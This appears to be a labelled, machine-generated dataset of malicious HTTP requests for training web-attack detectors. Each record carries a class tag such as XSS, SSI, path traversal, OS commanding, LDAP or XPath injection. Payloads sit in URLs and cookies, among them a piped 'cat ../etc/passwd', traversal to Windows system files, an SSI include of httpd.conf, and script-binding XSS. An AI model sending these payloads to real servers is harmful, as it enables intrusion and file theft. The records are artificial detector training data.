From: lqie@4vraituc.com
If-Modified-Since: Wed, 22 Oct 08 04:50:41 UTC
If-Unmodified-Since: Thu, 22 Sep 05 14:28:41 GMT
If-Match: "UGv7VqHg_OU6GP@SX"
If-None-Match: *
If-Range: Wed, 25 Oct 06 07:43:47 UTC
Max-Forwards: 0
MIME-Version: 2.0
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/orts/et6ah.tar
Range: 560-83908
Referer: /l7k3is/byar/idti/5tahsds.php3
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 8.0; tw-re; rv:7.1.4) Gecko/61509233
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: compress
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 668 www.ijuweeor.jpg "ywtodEgcana" "Mon, 30 Jun 08 19:43:35 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49253
Start - Id: 39191
class: SSI
POST /t2v7nYQl/gAc.TP/tbpRw9@B5p22C/kguaxtnsleydidf/erAece.shtml? HTTP/1.1
Content-Length: 228
Content-Language: lnu5UEtt,rPm,jidiO
Content-Encoding: compress
Content-Location: /7Rtil.msf
Content-MD5: d3B3d3RwbmhudWllYWZrYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Tue, 02 Mar 10 12:47:18 CET
Host: www.a1cw.biz
Connection: 4oir
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.6, compress, compress
Accept-Language: *;q=0.2
Cache-Control: idUo='oae'
Client-ip: 165.60.213.241
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="7"
Date: Fri, 18 Mar 05 22:53:55 GMT
ETag: W/"4o6Nz.t2GynO1u6u"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Fri, 10 Nov 06 24:49:25 CET
If-Unmodified-Since: Sun, 20 Jul 08 24:05:49 UTC
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: *
Max-Forwards: 372
MIME-Version: 8.1
Pragma: 1woam=eza
Proxy-Authorization: Digest realm
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: 53710-,-18914,6-
Referer: /ctto14/gntbM3aT/ryhnc/sw1Ne0e/t2eatn.swf
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 4.2; se-rm; rv:3.7.5) Gecko/47794778
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uel=sSPWH&3pxdropT.=epK3L&bsu=4869&1XBo_1Z=mogaccess_log 9aeh4like9kadminEct&nrdheVO2ruvwo=oxPRTOyxZlH&yh=<!--#echo var="date_gmt"-->&rurscs=tdsUd6_gt&ssanOAwm3yzti=4450&aey=gff8qe5Fyg&clzeir5stddrs=59&3PP_VGM@=pth

End - Id: 39191
Start - Id: 47256
class: XSS
GET /0Ratdm/szpkEoURkUiy28/HDFrqI3duefh0M/etdnrdiOtrhenot7hNr5/eYEKXmcuX7@Pg.aspx?lo7tp=Abu&hub2tmrsMud=0940&wciwX=%241e&rnaewSckeeedcH=yr4lTa1vu6rhh5o6td&l.access_logQZnD5=script+alert%28ttrhifmmn.tedr%29script+&H0tononhldo=Tecitrdl%3Ctos&oQio6Iotn=noQdhqpeKYl HTTP/1.0
Host: 142.165.225.148
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.2, iso-10646-ucs-2, windows-1258;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=11608
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Sun, 12 Dec 04 02:11:13 CET
ETag: W/"q0-hAtnazO7nbLaKys"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "loZCQXzn._kdkIhcZauH"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: "doRC.rA2HwIUCqh3"
Max-Forwards: 070
MIME-Version: 3.6
Pragma: aoTec='ois'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM YWRibm9hY2VteWVueWVpaXRzbzZyZTV0b2Jwenl0VzVjeWxpaWVsc2E=
Range: 074719-95,6-
Referer: /ejqq/oSuwia/OececXcs/ntjft.mp3
TE: chunked;q=0.4
Trailer: Warning
User-Agent: aeHit9zh/0.6.3.7
UA-CPU: StrongARM
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/3.1 57.250.92.138:1, 4.4 www.39Rit3te.jpeg
Transfer-Encoding: deflate
Upgrade: hth/1.0
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47256
Start - Id: 47907
class: XSS
GET /rD-LDI3c3zXSAeOoD/vSVW5updateDlIV2YWZC/dttre/9wyPdU9bHp52JLVieT9Q.gif?untolilnehixsi=otx&lyecouhg=2+d&N_vN=07&2t=%3Cdiv+++style++%3D++++%22+++++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.rielnean.com%2Fscript%2Feso.nsf%5D%29%3B%22++++%3E HTTP/1.1
Host: 228.23.86.116
Connection: close
Accept: image/*;q=0.0, video/quicktime, audio/basic;q=0.2
Accept-Charset: euc-tw;q=0.6, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: pewO=s
Client-ip: 51.142.233.184
Cookie: Rktneo5azb=z;ecelrdeji0o6osC=t5ea7dU1p;oealOtscd9t5=oftuk64guaatyexeno;tT=allychildma
Cookie2: $Version="38"
Date: Wed, 19 Mar 08 19:16:54 CET
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: nlrwmq
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: *
If-None-Match: "H9klOPmFb-OgsSNjL"
If-Range: Sun, 18 Apr 10 18:08:04 CET
Max-Forwards: 6
MIME-Version: 8.4
Pragma: ai=3cat7aiq
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: 0-,-42414
Referer: /ateF/Nsh72s/jxeer.htm
TE: trailers
Trailer: Authorization
User-Agent: bioaerxndgAtr8oic
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 1.0 105.74.177.221, 5.5 www.inwm.shtml, FTP/7.0 www.eriooa.js
Transfer-Encoding: 4ahRe; nsfv=sEt8n
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47907
Start - Id: 35982
class: PathTransversal
GET /ngi/fzcQAGSuf4qDIhJ/FSuetenysT/esnlh7heKn/KpcK/u4LEcb@df1OHxeD1rXe/Sie45Reautr/qWxservicesSRv4EX/njSn.mdb? HTTP/1.0
Host: www.uuniwR.uk:80
Connection: keep-alive
Accept: text/plain;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: v-im
Cache-Control: r='aeY2m'
Cookie: 3g2aeeaaqwl=s;tlhahuled=../../../WINNT/autoexec.bat
ETag: "kEI@Bmr3rwc4OnVXZNT"
If-Unmodified-Since: Sun, 29 Apr 07 14:01:02 GMT
If-Match: *
Pragma: no-cache
Referer: /ea5cwe/hndaj/88aelTm1.cfm
TE: deflate;q=0.7,trailers
User-Agent: naisc8shyoaSnm
UA-Pixels: 052x3579
Via: 1.9 144.141.42.244:37742, 6.4 227.195.181.136:9

null

End - Id: 35982
Start - Id: 39528
class: SSI
GET /8r3iHEMe/connect8varEaccess_logk3mRg/omdoei1t6nraul/t6/lte/XteON/ht0pefspL/1@9F/ag9e9nSA/lOZJxoyEamByzKT/eXm2gentd.asmx?S_bs8mP=clobjecte%7Cgwo&cpfD=coniu0z&anhgfnnss=a78NnaBEf HTTP/1.1
Host: www.7hei0.com:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 161.133.15.117
Cookie: cmxh4en=autsgn0dheqaaeyrm;ietketq=5;G9RRy4p=<!--    #include   virtual="/etc/httpd/httpd.conf"     -->
Cookie2: $Version="547"
Date: Sat, 22 Oct 05 22:39:50 UTC
ETag: W/"OEoLINto.7X5_nlPfIV"
Expect: inplr=aoao;utnrtUf=andhitoC
From: la7mbin@fqW5.cz
If-Modified-Since: Mon, 23 Aug 04 05:58:54 CET
If-Unmodified-Since: Thu, 05 Feb 09 18:33:52 UTC
If-Match: "YA6vaQkYB_E1EHJeQrT"
If-None-Match: "iwWzqB9eh5JK0Gm5b0Y-"
If-Range: Wed, 04 Jun 08 02:51:49 UTC
Max-Forwards: 3201
MIME-Version: 6.0
Pragma: 6l=i4ep
Proxy-Authorization: Digest algorithm=qHorcst
Authorization: Basic bGVlaWhuYXM6b2VlZW8=
Range: 430237-,-781
Referer: http://pfar.it/ee7eisth.png
TE: gzip,deflate;q=0.9
Trailer: TE
User-Agent: g7THeonto/0.4.2
UA-Pixels: 779x389
Via: FTP/0.5 241.113.165.215, 7.1 www.eiottht.tiff, 0.3 168.105.101.199
Transfer-Encoding: gzip
Upgrade: kiSb8e/4.9, Eefn/0.2, EwjNtl/1.5, 0modwG/7.2
Warning: 919 www.sytIt8o.jpg "tnran" 

null

End - Id: 39528
Start - Id: 46668
class: XSS
GET /owp-@CfE/rznZO8DtJ9QXE6v1.jpg?X_krKok=4243072&oo@7qNgU=lOitt+SGi&lptecRnasn8=eeky%5Dhay1+atf&twptqei=564&8wVDsuCdWh=c68nr&Zrctsccri4krn=ie&sLSFybT=84128&aeo=Sipo4rh&iliw=454&en=fEltsrtatit&astm=tn&lta0mp=etinsertwp-vU+homeofuS%3A&ilie4t=iframeutaef HTTP/1.0
Host: www.tzy8.biz
Connection: close
Accept: image/png
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: h-i, K-1hReiorg, Mroe-rm7oon;q=0.8, hjaNig-8arn
Cache-Control: no-store
Client-ip: 162.233.42.246
Cookie: jeTN=43763526;neaoouco9tnya=7nto7a;tgas3oeTH=<div  style ="    behaviour:     url([http://www.geelne.com/script/beoeae1evn.cfm]);    "  >
Cookie2: $Version="486"
Date: Sat, 22 Aug 09 14:15:36 UTC
ETag: W/"pVc-@H1sF2MLot6H0_e"
Expect: 100-continue
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Thu, 31 Mar 05 13:15:58 GMT
If-Match: "Lqxzz2@2WmEidge2MX_r"
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: thdemn Erejys=em5fo4cm
Authorization: NTLM bmhTZWFzeWEyc2VFM3dycGRybDVhaGVvbmU5b3RNOWVlZmswZGg=
Range: -3820,-75
Referer: /Qn8edoto/yDnq2/uQxttes.css
TE: trailers,gzip;q=0.8
Trailer: Referer
User-Agent: jiRPWPQq http://www.msekieu.gov
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color32
UA-Pixels: 630x4242
Via: 7.8 249.60.46.84
Transfer-Encoding: gzip
Upgrade: sNn/2.2, tbnncm/6.1
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 180.229.29.245
X-Serial-Number: 19077842196498
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46668
Start - Id: 45441
class: PathTransversal
PUT /Bpassthru/nnY.pl? HTTP/1.0
Content-Length: 75
Content-Language: eaen3re
Content-Encoding: identity
Content-Location: http://www.ebmtsy.ch/YaiE/dnhs/ATkS.gz
Content-MD5: UXZzb0t1cmljemVhbnJuZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jul 08 16:54:55 UTC
Last-Modified: Sat, 10 Feb 07 07:40:49 GMT
Host: www.fxsa.biz
Connection: keep-alive
Accept: video/quicktime;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 229.231.171.136
Cookie: jdkeIyEtSislcS=t8|;ds=hoxhonullt nupdatehttpe10gar ;hAxqeh9en=9k-psev+ t;JzgKdVdbC=zh_C22W3-I.0;miehlubhaeE=04;HwPNoe=52
Cookie2: $Version="192"
Date: Thu, 22 May 08 15:07:09 GMT
ETag: W/"k.KpTyIGNzkzzYks"
Expect: 100-continue
From: wiio@Osrnrd.com
If-Modified-Since: Mon, 04 Sep 06 05:10:38 UTC
If-Unmodified-Since: Wed, 19 Jan 05 14:05:51 UTC
If-Match: "sD6R3YL1fpOhN7_IkA"
If-None-Match: *
If-Range: "Qg5BMj6hf-QZvX9T"
Max-Forwards: 5901
Proxy-Authorization: NTLM ZXJ5ZHIxaG5zZWt1aGJ0c1NlYlRlaWlmbmlzVHNlQ21nQXR0bQ==
Authorization: Digest uri=http://geRmro.net/7tudst/lshalwr.avi
Referer: /adiW/i0rrm/hias.jsp
TE: trailers,chunked;q=0.4,chunked
Trailer: TE
User-Agent: 7Eb0Y6Sqbu http://www.osnto.st
UA-Disp: 8740,185,8
UA-Pixels: 9746x932
Via: FTP/5.6 85.101.1.160
Transfer-Encoding: identity
X-Forwarded-For: 173.42.173.213
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iec0rrprwta=N:\winnt\boot.ini&ntaetdsaugocd=8756471&eh=mmindonclmlllw

End - Id: 45441
Start - Id: 36175
class: PathTransversal
GET /nxnbaoiasT2tEaw6siat/OUDbinGR6IQG-libno/optvunionCc2R/tCE9G9/utaoi/nr7lpr47i/vNJnm_RcXI15xxXN_nVC/aexaajtIt3i.jpeg?t7in4smtrs7=14&tnecs1wr2=ltbHaenhlaytnNl&tgeeeaa=axY-&eL=OH%40le&1ooym=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&AFVy2GIed=3vSSO_B HTTP/1.0
Host: www.ihdo.de:48
Connection: etas3lrs
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-2;q=0.5
Accept-Encoding: gzip, identity, deflate, identity, deflate;q=0.1
Accept-Language: grdneh-ra
Cache-Control: no-store
Client-ip: 164.195.241.61
Cookie: -mXlink=dpCZRN_nMm;enesoblA3=760
Cookie2: $Version="99"
Date: Sun, 31 Oct 04 24:39:55 GMT
ETag: W/"rLPib2j-x4Vz7kREpS67"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Fri, 05 Oct 07 02:46:39 UTC
If-Unmodified-Since: Thu, 18 Sep 08 12:05:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jul 04 21:14:46 UTC
Max-Forwards: 717
Pragma: 4tmgrr='w'
Proxy-Authorization: NTLM cmVhYTE2aGFlaXRyZWhtYXZ0ZjdjU2E2b2lyc3NSOHlT
Authorization: Digest qop=auth
Range: 462654-
Referer: http://www.w7ewnm.st/2ses/enwtwie/ohwnea/aTed/o8boge.sh
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 2.9; eN-ne; rv:9.8.0) Gecko/60439462
UA-CPU: MIPS
UA-Disp: 4206,422,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5546x388
Via: gcnncl/8.8 www.1eodioN.jpeg
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 282 www.mar3eOer.jpg "Gzeol4" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36175
Start - Id: 43522
class: OsCommanding
GET /t@6cgeny0tpH/iieywteaeetenouu1neg/tvV0YhA0v60BBQDgsBu/qo6VvfZ1adK/telnetTBSEHP/osnirnnnrlvsest/7pSA5rj5eikGmPtdTXqg/0e-GVZX1ugj/hWu4a2L/oWsh1i-nnGT4C_EtCfGQ/Nse4aieved3.pl?4FXb92Qx2C6u=488611&n6=ibp&lan=%7C+cat++++..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+%7C&s5Tswr=voJ HTTP/1.1
Host: www.ztdu6hse.org:80
Connection: umyz3ew
Accept: image/png;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: min-fresh=6535
Client-ip: 108.184.195.217
Cookie: etrfqeYj=078001;ie8t=2$(A;BBNgM=7715434;d5cDmiTrySajyi=1;YxevalGael=9
Cookie2: $Version="241"
Date: Sat, 15 Jan 05 12:32:02 GMT
ETag: "ktdX-vkOq-6vCtnMc"
Expect: rewl
From: ioojil@heyq.net
If-Modified-Since: Mon, 02 Aug 04 15:26:52 CET
If-Unmodified-Since: Thu, 23 Apr 09 16:29:47 CET
If-Match: *
If-None-Match: "GuvKg8zbi9iFp-2"
If-Range: Tue, 17 Apr 07 16:41:33 CET
Max-Forwards: 232
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: NTLM bHNwMmNsQ2JpT3RubWVzZmFpdGtpaG9sZGlPSGlpdUVoY28=
Authorization: nnsn shi3=qiRdkawr
Range: -2781,-259,93-77910
Referer: /amti48/aazbi/Eursh5w.bin
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (Windows; U; Win98 0.3; ng-9h; rv:7.7.2) Gecko/89012914
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 893x087
Via: cpn/6.2 130.103.221.92
Transfer-Encoding: gzip
Upgrade: itme/0.9
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 119.116.114.21
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43522
Start - Id: 38366
class: LdapInjection
GET /ntxan/qTJnl4oIMveLJX/dchildY9A@W/htge0tri.jpeg?zhposL=s65Rf&eueootlmo=%29+++%28++%7C++%28displayName%3Dhad*%29++++%28name++++%3Dhad*+%29%28+mail%3Dhad*%29&eulcnydn=+hg+aivarsah&rttgid0e9=sGP&fghadSlnslzfcfe=88477&sstany=deleteeit&iQ7ernuNvghAnd7=otreGsd7&tas7ohtcm=gu1yauiigh&tneeor0t=abJJOxhK0&rvGnnitIetooiG=Wx5&xOP9XX0apcuI=Hxih%3Cxa%2F&84tbaeEu=nLql6&saa=onc HTTP/1.1
Host: 244.212.107.20:22
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: zleshl-9n51ogt;q=0.2, Njes-vPSesrtm
Cache-Control: min-fresh=5
Client-ip: 193.201.183.61
Cookie: xyCVBtzCukE=alttgzlocationsebt:jSiphp5d'3;jdn6=tt srt i;9ZrmautoexecY-51y=398293;AoLTlcrsnd=htaccesMh'htvbscripttelnetyStsk
Cookie2: $Version="3"
Date: Tue, 27 Jan 09 04:50:49 CET
ETag: "XdKqihpT_MZZjEK6G"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Fri, 27 Feb 04 02:01:10 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 5
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: NTLM c2VlaXpvdDN4bjdTdXUzZnJhYW1kb3VmZXJsdnFzd2l1aWVFTmw=
Range: -0,582766-
Referer: /sInx/lodo/r1tfnvpd/2b4vsn/ggqs.bin
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 2.2; ht-rD; rv:6.2.4) Gecko/90232330
UA-CPU: 68000
UA-Disp: 8585,869,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 8.2 www.nxQa2r.js
Transfer-Encoding: gzip
Upgrade: ooh/1.6, rCeq/8.8
Warning: 242 www.rnh0htla.jpg:8 "nyednaRaaanaige" "Wed, 12 Mar 08 13:13:41 GMT"
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38366
Start - Id: 47866
class: XSS
GET /eaXGG-kG3BsMME._L/esllriDTshc/auhSkyNgJ4XuW2W4U1cP/mpU/ncB3W_29a.XM/yndntitsmr/tpmo3io6twtia/LT3mXIniBD/o9AAgsti.msf?chu=%3Cdiv+++++style+%3D++%22binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.orta.com%2Fscript%2Fynma.swf%5D%29%3B%22++%3E&3anrtsBrci=rn HTTP/1.1
Host: 34.177.143.16
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: identity, compress, deflate;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 5.197.242.191
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="8"
Date: Tue, 10 Oct 06 14:44:47 GMT
ETag: "7FkK8i3Djc70HRyX"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: *
If-Range: "LT1pU7QIvOSM@Aaau"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: oiieaxf=3ndp3
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Digest algorithm=MD5-sess
Range: 541-3,060-23987,670-3
Referer: /hSoe/7bhlse/srr0RwBl/i6juei.wav
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ideUglee/1.7.7
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 546 www.taehteaa.gif "qmeXpetfcrEeeEci" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47866
Start - Id: 38332
class: LdapInjection
GET /sugenatrntshhiy/hcaEomnIncgo/76aWbAoGB/2pI7-6ThKKLzW/xnEcynnatgfYtt8.jpg?ternfodwmnn=eqei1&Renly8o6mtD=%29++%28%7C++%28cn%3D*o%27brien*+%29%28mail+++%3D*o%27brien*+++%29++&6KYK6S=9cis4ec&Ovo0ausgus=63402304&ytodt=%7Ee%7Cq&gfqehrrbisf=ooe&iCis1=7yeh&hIoeomg0rItn1y=enaralqttaeett&os=57849 HTTP/1.1
Host: www.zrqhjsidc.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1255, cp-932
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.4
Cache-Control: max-age=0
Client-ip: 83.209.156.197
Cookie: unteeo2=yatdjevhhousrccrs@l;j0dwwix3zsock_stream-=oyrS;rSuN=31016;weaTiy=064233802
Cookie2: $Version="689"
Date: Thu, 27 Oct 05 04:46:31 UTC
ETag: "WbPrN@xJVi3tQ@DS"
Expect: 100-continue
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Fri, 09 Mar 07 07:26:50 CET
If-Unmodified-Since: Wed, 07 Jul 04 16:26:38 UTC
If-Match: "WcYr04L_hY7FT3Yv"
If-None-Match: *
If-Range: Fri, 21 Oct 05 24:29:05 UTC
Max-Forwards: 8
MIME-Version: 0.4
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic YWFuaTZudmo6aGRob3k=
Range: 4549-1
Referer: /nv9nerh.rar
TE: gzip;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 6.3; Pj-a8; rv:7.7.7) Gecko/55671595
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: 7.2 www.Altolo.png:8870, 1.8 78.30.23.67, a2fA/7.5 50.73.68.131
Transfer-Encoding: deflate
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38332
Start - Id: 49576
class: XPathInjection
GET /2m4gobr7gvnrJneos/XRzposition8delete/id@xaautoexec.tiff?ere5le2t=7fhoejonet1nio&ee=e0t6zde%27++++or++%28i+++++%3C+++++count%28ttN%2Fchild%3A%3Atext%28%29%29++and+++++j++++%3C+++++count%28rsqser%2Fchild%3A%3Acomment%28%29%29++++and+++k++++%3C+++count%28isnor%2Fchild%3A%3A*%29++%29+or+%27nl%27%3D++%27+++++elt%27++++or&l.-9D.Hb=376225&u1hsts=e6oCp HTTP/1.1
Host: www.enL3ns.ch
Connection: close
Accept: application/rtf;q=0.1, video/*;q=0.9
Accept-Charset: x-mac-hebrew;q=0.8, windows-874;q=0.0, x-mac-cyrillic;q=0.7, iso-10646-ucs-2, cp-936;q=0.0
Accept-Encoding: gzip;q=0.9, identity, deflate;q=0.3
Accept-Language: ye7ynys-n, cGss-LbtArm, rs-HrH;q=0.6, sr-d
Cache-Control: only-if-cached
Client-ip: 165.72.212.249
Cookie: 1afraiprntal=01695824;toTw0si=fat
Cookie2: $Version="6"
Date: Sat, 14 Apr 07 07:45:05 CET
ETag: W/"BDMRBwNmUW7P.XXGn"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Tue, 07 Oct 08 21:09:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Jun 05 06:37:51 UTC
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: NTLM a2hkZW5pcFRtbWh0ZXVlc25vbm93bmVtbzVhaWFwb2RldHY2dWFlb2g=
Range: -351866,-996363,00-
Referer: http://sad4I.org/reEtt5/prr8/ochp/grcmaem.mpg
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 7.2; 6t-hA; rv:1.0.9) Gecko/46553608
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2073x766
Via: 9.4 8.246.77.161, 1.0 www.pehi5h.js
Transfer-Encoding: gzip
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49576
Start - Id: 42969
class: OsCommanding
